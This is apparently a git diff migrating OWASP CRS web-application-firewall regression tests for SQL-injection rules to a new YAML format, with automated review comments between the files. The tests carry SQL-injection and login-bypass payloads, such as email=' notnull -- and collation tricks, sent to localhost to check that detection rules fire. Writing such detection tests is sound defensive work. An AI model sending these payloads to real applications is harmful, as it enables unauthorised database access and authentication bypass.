test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 
80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 27 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 28 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 29 desc: "SQL collate`nocase`" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%60nocase%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 30 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20foo--" - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 31 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate`utf8mb4_general_ci` - data: "var=user'collate%60utf8mb4_general_ci%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 32 desc: "Collate bypass with character escaping" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate"\utf8mb4_general_ci" - data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-33 + 
- input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate U&"\0441\043B\043E\043D" - data: "var=user'collate U%26%22%241%23B%23E%23D%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20notnull%20--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/post" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: - text=It is highly unlikely this is going to be a false positive - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test 
agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' - version: HTTP/1.1 - output: - log_contains: id "942120" - - test_title: 942120-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log: + expect_ids: [942120] + - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - text=After calculating the likelihood this should not be matched. - version: HTTP/1.1 - output: - no_log_contains: id "942120" - - test_title: 942120-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. 
+ version: HTTP/1.1 + output: + log: + no_expect_ids: [942120] + - test_id: 39 desc: "Detect path-based SQLi attempt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: POST - uri: "/post/catalogue/rest/products/2499999||this.product/reviews" - version: HTTP/1.0 - output: - log_contains: id "942120" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/post/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 594e372..c4d4e99 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml 
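Review bot: Test 28 in the new 942120.yaml is a byte-for-byte copy of test 27 (same desc "SQLite collate nocase", same payload `var=user'collate%20nocase--`, same `expect_ids: [942120]`), so it adds no coverage and should be dropped or changed to a distinct collation payload. Test 31 keeps the desc "Invalid SQL collate foo" inherited from the negative test 30, but its payload is the valid collation `utf8mb4_general_ci` and it expects a match; a description such as `desc: "SQL collate with backtick-quoted utf8mb4_general_ci"` would stop it reading as a negative test. The comment above test 33's data says `collate U&"\0441\043B\043E\043D"`, yet `%24`/`%23` decode to `$`/`#` rather than backslash-escaped code points, so either the comment or the encoded payload looks wrong and is worth confirming against the rule's regex. Tests 37 and 38 also switch to `version: HTTP/1.1` while every other stage in the file uses HTTP/1.0; if that is deliberate, a one-line comment saying why would help.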
@@ -1,160 +1,158 @@
 ---
 meta:
 author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit"
- description: None
- enabled: true
- name: 942130.yaml
+rule_id: 942130
 tests:
- - test_title: 942130-1
+ - test_id: 1
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test"
- version: HTTP/1.0
- output:
- no_log_contains: id "942130"
- - test_title: 942130-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 2
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1=1"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1=1"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 3
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11=1"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11=1"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 4
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1=11"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1=11"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 5
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11!=11"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=11"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 6
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=b,1=1"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=b,1=1"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 7
 desc: "SQL Injection Attack: SQL Tautology - like"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- uri: "/post"
- data: "a=42%20like%2042"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a=42%20like%2042"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 8
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=This%20is%20like%20no%20other"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=This%20is%20like%20no%20other"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 9
 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=42<=>42"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=42<=>42"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 10
 desc: "SQL Injection Attack: SQL Tautology using glob"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
index 934a8ac..37712c3 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
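Review bot: The negative stages in this file keep the positive tests' `desc` verbatim, so a runner failure does not say which way the expectation runs: tests 1, 3, 4, 5 and 8 assert `no_expect_ids: [942130]` under `desc: "SQL Injection Attack: SQL Tautology"`, the same text as the positive tests 2 and 6. The `desc` lines are unchanged context, so this is carried over from the old format rather than introduced by the migration, but the new `test_id` numbering makes the description the only readable label left. 942131 (tests 3 and 7) has the same gap even though its test 5 already uses `desc: "SQL Injection Attack: SQL Tautology negative"`, and 942140 gives all 17 stages one identical `desc` so only the `data:` value distinguishes them. Adopting the 942131-5 wording for every `no_expect_ids` stage, e.g. `desc: "SQL Injection Attack: SQL Tautology negative (11=1)"`, would make intent visible in the output without touching the requests.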
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml 
@@ -2,113 +2,112 @@
 meta:
 author: "Felipe Zipitria"
 description: SQL Tautology
- enabled: true
- name: 942131.yaml
+rule_id: 942131
 tests:
- - test_title: 942131-1
+ - test_id: 1
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11!=1"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=1"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 2
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1!=11"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1!=11"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 3
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11!=11"
- version: HTTP/1.1
- output:
- no_log_contains: id "942131"
- - test_title: 942131-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=11"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942131]
+ - test_id: 4
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1%20is%20not%202"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1%20is%20not%202"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 5
 desc: "SQL Injection Attack: SQL Tautology negative"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1%20is%20not%201"
- version: HTTP/1.1
- output:
- no_log_contains: id "942131"
- - test_title: 942131-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1%20is%20not%201"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942131]
+ - test_id: 6
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- uri: "/post"
- data: "a='1' not regexp '2'"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a='1' not regexp '2'"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 7
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- uri: "/post"
- data: "a='1' not regexp '1'"
- version: HTTP/1.1
- output:
- no_log_contains: id "942131"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a='1' not regexp '1'"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942131]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
index e05f3f2..421fedd 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
@@ -1,295 +1,293 @@
 ---
 meta:
 author: "Christian S.J. Peron, Christoph Hansen, azurit"
- description: None
- enabled: true
- name: 942140.yaml
+rule_id: 942140
 tests:
- - test_title: 942140-1
+ - test_id: 1
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
